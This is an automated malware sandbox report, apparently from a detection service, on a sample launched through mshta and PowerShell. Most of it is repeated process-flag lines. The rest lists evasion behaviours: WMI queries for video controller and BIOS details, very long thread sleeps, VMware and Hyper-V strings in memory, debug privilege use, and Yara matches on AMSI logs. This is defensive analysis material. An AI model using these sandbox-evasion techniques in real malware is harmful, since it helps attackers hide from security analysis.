                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4130Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5667Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3780Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5925Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1433Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3900Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep time: -120000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144Thread sleep count: 1433 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: mshta.exe, 00000000.00000002.1670694800.00000000057CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: powershell.exe, 0000000A.00000002.2753286455.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2754093780.0000000002EA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: powershell.exe, 00000002.00000002.1876036563.000000000714B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                          Source: powershell.exe, 00000002.00000002.1869747219.0000000002BF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5a
                          Source: powershell.exe, 00000002.00000002.1869747219.0000000002BF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}="
                          Source: powershell.exe, 00000005.00000002.2633763630.0000000007A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004431A0 LdrInitializeThunk,10_2_004431A0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: amsi32_744.amsi.csv, type: OTHER
                          Source: Yara matchFile source: amsi32_4628.amsi.csv, type: OTHER
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4628, type: MEMORYSTR
